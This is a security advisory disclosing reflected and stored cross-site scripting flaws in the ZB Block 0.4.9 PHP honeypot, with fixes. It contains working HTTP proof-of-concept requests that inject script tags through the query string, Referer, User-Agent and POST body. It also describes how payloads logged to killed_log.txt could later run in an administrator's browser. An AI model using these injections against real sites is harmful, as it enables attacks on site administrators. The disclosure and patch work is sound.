Vulnerable Software:
// ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK
// VERSION 0.4.9 Final "Jaguar"
0.4.9_Final
Developed by HTTP://WWW.SPAMBOTSECURITY.COM
--------------------------------------------------------------------------------------------------------------------
Severity: *Low*
--------------------------------------------------------------------------------------------------------------------
Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES)
--------------------------------------------------------------------------------------------------------------------
Found by: AkaStep
-------------------------------------------------------------------------------------------------------------------
Description:
ZB Block is distributed under the GNU/GPL Version 2 License.
Its main goal:
Act as a "honeypot" on your site and block intrusions.
For more info:
SPAMBOTSECURITY.COM
-------------------------------------------------------------------------------------------------------------------
Vulnerability Desc:
Because it "trusts" HTTP_USER_AGENT and HTTP_REFERER,
ZB Block is vulnerable to a non-persistent cross-site scripting vulnerability.
However, it also logs attacks, so the unsanitized variables are written to killed_log.txt,
which in the "future" may act as a persistent cross-site scripting vulnerability against the admin.
-------------------------------------------------------------------------------------------------------------------
Proof of Concept:
====================Triggering Attack Against Site which is protected using ZB Block========================
cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script>
cmd> User-Agent: <script>alert("Pwn Using user Agent");</script>
cmd> Host: 192.168.0.15
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
hdr> Content-Length: 3890
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
================= END OF REQUEST ======================================
Response (note that it doesn't touch HTTP_REFERER and HTTP_USER_AGENT; they are the same as the "original", without any sanitization):
--------------------------------------------------- SNIPPET GOES -------------------------------------------------------
<strong><font color="#0000FF">Record #:</font></strong> 1<br>
<strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br>
<strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br>
<strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br>
<strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br>
<strong><font color="#0000FF">Post:</font></strong> <br>
<strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br>
<strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br>
<strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br>
<strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br>
<strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br>
<br> Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p>
</body>
</html>
--------------------------------------------------- END OF SNIPPET -------------------------------------------------------
Print Screen:
http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png
/*----------------------------------------------VULNERABLE CODE--------------------------------------------------------------*/
//zbblock.php
// LINE NO 455 && 459
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];}
$fromhost=strtolower($fromhost2);
$fromhostsws=preg_replace('/\s+/','',$fromhost);
$fromhostsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$fromhostsws);
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];}
$lcuseragent=strtolower($useragent);
$lcuseragentsws=preg_replace('/\s+/','',$lcuseragent);
$lcuseragentsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$lcuseragentsws);
/*------------------------------------- END OF VULNERABLE CODE -------------------------------------------------------*/
By default this script writes a log file:
filename: killed_log.txt
Located in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt
which is not readable over HTTP (because access to that area is protected using .htaccess with "Deny from all").
OK, let's see its content after triggering the attack:
-----------------------------------------------------------------------------------------------------------------------------------------
# cat -n killed_log.txt|less
1 <?php die(''); ?>
2
3 #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final
4 Host: labmachine.mshome.net
5 IP: 192.168.0.1
6 Score: 6
7 Violation count: 0
8 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
9 Query: id=<ScRiPt>AlErT("Not
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
12 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not
13
14 #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final
15 Host: labmachine.mshome.net
16 IP: 192.168.0.1
17 Score: 6
18 Violation count: 1
19 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
20 Query: id=<script>alert("Is
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>
23 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is
24
------------------------------------------------------------------------------------------------------------------------------------------------
As you can see:
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>
Same as the original. In the future this may cause problems for the site administrator.
Can't, because it's a .txt file and protected using .htaccess? :)
This gives us a bit of an advantage to catch the site admin and automatically exploit our XSS attack.
There is a chance the admin will read that file using some "reader script", believing that killed_log.txt is safe.
For example:
----------------------------------------------------------------------------------------------------------------------------------------------
<?php
echo '<pre>' .
file_get_contents('./vault/killed_log.txt') . '</pre>';
?>
----------------------------------------------------------------------------------------------------------------------------------------------
So, there is a chance to execute our JavaScript (HTML) in the context of the admin's browser.
The fix is simple:
ZB Block developer(s) should note that HTTP_USER_AGENT and HTTP_REFERER aren't "trust"-able and may be spoofed
or injected easily.
So htmlentities() or strip_tags() are our best friends in this case :)
------------------------------------------------- FIX 1---------------------------------------------------------------------------------------
//zbblock.php
//LINE NO 455
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);}
//LINE NO 459
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);}
// END OF
-----------------------------------------------------------------------------------------------------------------------------------------------
Here is also another non-persistent XSS, triggered while detecting a POST request intrusion attempt.
--------------------------------------------- POST METHOD--------------------------------------------------------------------------------------
cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php
cmd> Content-Type: application/x-www-form-urlencoded
cmd> Host: 192.168.0.15
cmd> Content-Length: 58
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059.
hdr> Content-Length: 3548
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21
// Note that our payload is not URL-encoded //
-------------------------------------------------------------------------------------------------------------------------------------------------
Response:
----------------------- SNIPPET -------------------------------------------------------------------------------------
<strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br>
----------------------- END OF SNIPPET -------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
So why does this occur?
Again, let's look at the code:
------------------------------------------ VULNERABLE CODE -------------------------------------------------------------
//zbblock.php
// Line: no: 856
<strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br>
//
------------------------------------------------------------------------------------------------------------------------
// And if we look up at line no: 472
$rawpost=file_get_contents("php://input");
//No sanitization again
// I think
/*--------------------------- SINCE the POST data content is not logged to killed_log.txt
and is only printed to the client side, we can use on line 855:
<strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br>
This also applies to line no: 838
$dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy);
---------------------------------------------------------- EOF --------------------------------------------------------------------------------*/
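As an added example (not ZB Block's own code) covering both FIX 1 and the POST section above, the following PHP escapes the Referer, User-Agent and raw POST body once at the boundary and also shows a safe version of the admin's "reader script". Function names and the $record layout are assumptions; the column labels and the control-character regex are the advisory's.

```php
<?php
// Added example, not ZB Block's own code. Function names and the $record layout
// are assumptions; the column labels and regex are taken from the advisory.

// Strip control characters as ZB Block already does, then HTML-encode the value
// so <, >, &, " and ' can never be interpreted as markup by any consumer.
function zb_safe_text($value) {
    $value = preg_replace("/[^\x9\xA\xD\x20-\x7F]/", '', (string)$value);
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read the three untrusted inputs the advisory names. The raw copies stay
// available for ZB Block's signature matching; only the escaped copies are
// ever placed in the 403 page, killed_log.txt or the mailto body.
function zb_collect_request(array $server, $rawpost) {
    $referer   = isset($server['HTTP_REFERER'])    ? $server['HTTP_REFERER']    : '';
    $useragent = isset($server['HTTP_USER_AGENT']) ? $server['HTTP_USER_AGENT'] : '';
    return array(
        'raw'  => array('referer' => $referer, 'useragent' => $useragent, 'post' => $rawpost),
        'safe' => array(
            'referer'   => zb_safe_text($referer),
            'useragent' => zb_safe_text($useragent),
            'post'      => zb_safe_text($rawpost),
        ),
    );
}

// Replacement for the vulnerable "Post:" / "Referer:" / "User Agent:" lines.
function zb_record_html(array $safe) {
    return '<strong><font color="#0000FF">Post:</font></strong> ' . $safe['post'] . "<br>\n"
         . '<strong><font color="#0000FF">Referer:</font></strong> ' . $safe['referer'] . "<br>\n"
         . '<strong><font color="#0000FF">User Agent:</font></strong> ' . $safe['useragent'] . "<br>\n";
}

// Safe counterpart of the admin "reader script": treat the log as untrusted
// data and escape it on output, whether or not it was escaped when written.
function zb_show_log($path) {
    $log = (string)@file_get_contents($path);
    return '<pre>' . htmlspecialchars($log, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

// Constructed sample request carrying the advisory's payloads.
$request = zb_collect_request(
    array('HTTP_REFERER'    => 'http://attacker.invalid/you?id=<script>alert("referer");</script>',
          'HTTP_USER_AGENT' => '<script>alert("Pwn Using user Agent");</script>'),
    'f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21'
);
echo zb_record_html($request['safe']);
```

Escaping on output in zb_show_log() is what protects an admin against records that were written by an unpatched version, since the existing killed_log.txt still contains the raw payloads.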
/AkaStep ^_^
1330959272